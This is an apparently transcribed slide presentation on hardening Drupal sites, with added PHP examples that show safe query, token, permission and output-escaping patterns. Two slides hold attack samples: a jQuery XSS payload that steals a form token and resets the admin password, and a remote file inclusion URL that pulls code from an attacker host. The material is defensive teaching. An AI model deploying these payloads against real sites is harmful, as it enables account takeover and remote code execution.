Drupal Security Hardening
All about web security and vulnerabilities and how to counter measure these threats.
Usage Rights: CC Attribution License
Presentation Transcript

  • Agenda
    ● Anatomy of Vulnerabilities
    ● Protecting against Vulnerabilities
  • Kite Systems is an Agile development house, which means the client is actively involved all the way through the development process. We build high quality, secure platforms using Java J2EE, Microsoft .NET, Ruby on Rails, PHP and Python.
  • Join Us
  • About myself, Gerald Villorente
    ● Web Developer/themer at Kite Systems Inc.
    ● Drupal developer since 2010
    ● Drupal PH kids mentor
  • Is Drupal Secure?
  • State of being “SECURE”
    “A site is secure if:
    ● private data is kept private,
    ● the site cannot be forced offline or into a degraded mode by a remote visitor,
    ● the site resources are used only for their intended purposes,
    ● the site content can be edited only by appropriate users.”
  • Weak spots of web applications
    For a Drupal developer who wants to deliver an application, security does not end with proper use of the Drupal security API:
    ● OS (MS, Unix, BSD, OS X)
    ● Web Server (Apache, IIS, Nginx, ...)
    ● Web Platform (PHP, .NET, ...)
    ● Other Services (ftp, …)
    ● Web applications - attacks against authentication & authorization, site structure, input validation, app logic
    ● Database - SQL injection
    ● Availability - DoS attacks
  • Common Drupal attacks
    ● XSS
    ● CSRF
    ● Injection
  • XSS
    The slide's example payload, with the quoting lost in transcription restored:
      jQuery.get(Drupal.settings.basePath + 'user/1/edit', function (data, status) {
        if (status == 'success') {
          // Extract the token and other required data
          var matches = data.match(/id="edit-user-profile-form-form-token" value="([a-z0-9])"/);
          var token = matches[1];
          // Post the minimum amount of fields. Other fields get their default values.
          var payload = {
            "form_id": 'user_profile_form',
            "form_token": token,
            "pass[pass1]": 'hacked',
            "pass[pass2]": 'hacked'
          };
          jQuery.post(Drupal.settings.basePath + 'user/1/edit', payload);
        }
      });
  • Other Attacks
    ● DDoS
    ● Remote code execution - exploiting register_globals in PHP:
        require ($page . ".php");
      http://www.vulnsite.com/index.php?page=http://www.attacker.com/attack.txt
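As an added example (not from the slides), the register_globals include pattern from the slide is shown beside a hardened version that maps the request value onto a fixed allowlist instead of building a path from it; the page names and the pages directory are hypothetical:

```php
<?php
// Added example (not from the slides): the slide's include pattern beside a
// hardened form. The page names and the pages directory are hypothetical.

// Vulnerable: an attacker-controlled $page is concatenated into require().
// With register_globals on, ?page=... populates $page directly; with
// allow_url_fopen/allow_url_include on, a remote URL is fetched and executed,
// and even locally "../" traversal reaches files outside the intended directory.
function render_page_vulnerable($page) {
  require($page . '.php');
}

// Hardened: never derive a filesystem path from raw input. Look the value up
// in an allowlist of known pages and refuse everything else.
function render_page_hardened($page, $pages_dir = null) {
  $allowed = array('home', 'about', 'contact');   // hypothetical page names
  if (!in_array($page, $allowed, TRUE)) {
    header('HTTP/1.1 404 Not Found');
    return FALSE;
  }
  if ($pages_dir === null) {
    $pages_dir = __DIR__ . '/pages';
  }
  require $pages_dir . '/' . $page . '.php';
  return TRUE;
}

// Read the parameter explicitly rather than relying on register_globals.
$page = isset($_GET['page']) ? (string) $_GET['page'] : 'home';
render_page_hardened($page);
```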
  • Demo
  • Counter Measures
    ● Proper use of the Drupal API
    ● Coding Standard (coder, code_sniffer) - Coder & Sniffer demo
    ● Keep up with security patches and minor releases
    ● Permission by role (hook_perm, user_access)
    ● Firewall
    ● SSL (Secure Socket Layer)
  • Counter Measures (cont.)
    ● File permissions
  • Apache Hardening
    ● Disable unneeded modules
    ● Implement ModSecurity: request filtering, anti-evasion techniques, HTTP filtering rules, full audit logging, HTTPS intercepting, chroot functionality, masking of the web server identity
    ● Document root restriction – allow Apache to go only to /path/to/public_html
  • Apache Hardening
    ● Chrooting Apache
        $ mkdir -p /var/chroot/apache
        $ adduser --home /var/chroot/apache --shell /bin/false --no-create-home --system --group juandelacruz
  • PHP Hardening (part 1)
    ● turn off register_globals
    ● open_basedir - restrict PHP file access to certain directories only
    ● disable_functions
    ● expose_php - remove PHP info from HTTP headers
    ● display_errors
    ● safe_mode - PHP can use only files it owns
    ● allow_url_fopen
  • PHP Hardening (part 2)
    ● Suhosin - PHP engine protection: a set of patches providing runtime protection, session protection, filtering features and logging
  • Drupal Hardening
    ● Keep updated
    ● Coding standard
    ● Install only trusted modules; check the issue queue
    ● Use captcha, login_security, single_login, password_policy, salt
    ● User permissions
    ● Input formats and filters
  • Drupal Hardening: Coding Standard
    Never write and/or execute SQL commands manually; use the Drupal DB layer and use db_query() properly.
    Don't write this (the variable is interpolated straight into the query):
        db_query("SELECT * FROM {users} WHERE name = $username");
    Write this (a quoted placeholder, escaped by db_query()):
        db_query("SELECT * FROM {users} WHERE name = '%s'", $username);
    Placeholders are: %s, %d, %f, %b, %%
    Use db_rewrite_sql to respect node access restrictions:
        $result = db_query(db_rewrite_sql("SELECT n.nid, n.title FROM {node} n"));
  • Drupal Hardening: Form API
    ● Never write forms manually; use Drupal's Forms API
    ● Forms API protects you from invalid form data
    ● Forms API protects you against CSRF
    ● Don't trust JS for input validation, it is easy to disable; if you use it, always check user data on the server side as well
    ● When using AJAX, use drupal_get_token and drupal_check_token:
    ● The token is a hash of a defined string, the user session and a site-specific secret
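As an added example (not from the slides) covering both the DB layer and the AJAX token points above, here is a Drupal 6 style module fragment: a quoted placeholder query, a node-access-aware listing, and an AJAX callback that refuses requests without a valid session-bound token. The module name "example", the token string, the variable name and the permission string are hypothetical.

```php
<?php
// Added example (not from the slides): Drupal 6 style placeholders, db_rewrite_sql()
// and a token-checked AJAX callback. Module name "example", the token string
// 'example-toggle' and the permission 'toggle example setting' are hypothetical.

// The placeholder is quoted in the SQL ('%s'); db_query() escapes the argument,
// so a name such as  x' OR '1'='1  is compared as a literal string.
function example_load_user_by_name($username) {
  $result = db_query("SELECT uid, name FROM {users} WHERE name = '%s'", $username);
  return db_fetch_object($result);
}

// %d forces an integer; db_rewrite_sql() adds the node-access joins so the
// listing respects the current user's per-node permissions.
function example_recent_nodes($limit) {
  $sql = "SELECT n.nid, n.title FROM {node} n WHERE n.status = %d ORDER BY n.created DESC";
  $result = db_query_range(db_rewrite_sql($sql), 1, 0, (int) $limit);
  $nodes = array();
  while ($row = db_fetch_object($result)) {
    $nodes[$row->nid] = $row->title;
  }
  return $nodes;
}

// When rendering the page, hand the browser a token bound to this session.
function example_add_token_setting() {
  $settings = array('example' => array('token' => drupal_get_token('example-toggle')));
  drupal_add_js($settings, 'setting');
}

// The AJAX callback must receive the same token back; a request forged from
// another site (the CSRF case) cannot supply it. The token is a hash of the
// string, the session id and the site's private key. In core the validating
// function is drupal_valid_token(), not drupal_check_token().
function example_ajax_toggle() {
  $token = isset($_POST['token']) ? (string) $_POST['token'] : '';
  if (!drupal_valid_token($token, 'example-toggle') || !user_access('toggle example setting')) {
    drupal_access_denied();
    exit;
  }
  variable_set('example_toggled', !variable_get('example_toggled', FALSE));
  drupal_json(array('status' => 'ok'));
}
```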
  • Drupal Hardening: File Upload
    ● file_validate_is_image - check that the file really is an image
    ● check_file - check that the file was uploaded via HTTP POST
    ● file_check_location - check that a file is really located inside $directory
    ● Set disk quotas properly; you don't want to fill the server's hard disk
  • Drupal Hardening: Respect and define new permissions
    ● Consider using hook_perm in your module
    ● Wrap your code with user_access:
        if (user_access('some permission')) { ... }
    ● filter_access($format) – check whether the user has access to the requested filter format
    ● Use menu access arguments
  • Drupal Hardening: Don't trust user input
    Filter user input, sanitize the output
    ● Input Format
    ● filter_xss() - filters HTML to prevent XSS
    ● check_plain() - encodes special characters in a plain-text string for display as HTML
    ● check_url() - filters dangerous protocols
    ● check_markup() - runs all the enabled filters on a piece of text
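As an added example (not from the slides) covering the permissions and output-sanitization slides above, a Drupal 6 style module declares a permission, enforces it through menu access arguments and again in the callback, and escapes each untrusted value with the function suited to where it lands in the HTML. The module name "example", the path and the permission string are hypothetical.

```php
<?php
// Added example (not from the slides): declaring a permission, enforcing it in
// the menu router and in the callback, and escaping untrusted values on output.
// Module name "example", the path and the permission string are hypothetical.

function example_perm() {
  return array('view example reports');
}

function example_menu() {
  $items['example/report/%'] = array(
    'title' => 'Example report',
    'page callback' => 'example_report_page',
    'page arguments' => array(2),
    // Menu access: the router answers "access denied" before the callback runs.
    'access arguments' => array('view example reports'),
    'type' => MENU_CALLBACK,
  );
  return $items;
}

// Defence in depth: re-check the permission, then sanitize every untrusted value
// at the point where it becomes HTML (filter the input, sanitize the output).
function example_report_page($label) {
  if (!user_access('view example reports')) {
    drupal_access_denied();
    return;
  }
  $link = isset($_GET['link']) ? $_GET['link'] : '';
  $body = isset($_GET['body']) ? $_GET['body'] : '';

  // check_plain(): a <script> tag in $label is shown as text, never executed.
  $output = '<h2>' . check_plain($label) . '</h2>';
  // check_url(): "javascript:" and similar protocols are stripped from the href.
  $output .= '<p><a href="' . check_url($link) . '">Source</a></p>';
  // filter_xss(): only the listed tags survive; event-handler attributes are removed.
  $output .= '<div>' . filter_xss($body, array('a', 'em', 'strong', 'p')) . '</div>';
  return $output;
}
```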
  • Drupal Hardening: Don't trust user input
  • Again, think like a hacker...
    ● Use penetration testing tools
      - Metasploit framework
      - Nessus
      - Nikto
      - BackBox and BackTrack
    ● Fix, audit, fix ...
  • Resources
    ● http://drupal.org/security
    ● http://drupal.org/writing-secure-code
    ● http://crackingdrupal.com
    ● http://www.owasp.org
    ● http://ha.ckers.org
    ● http://www.exploit-db.com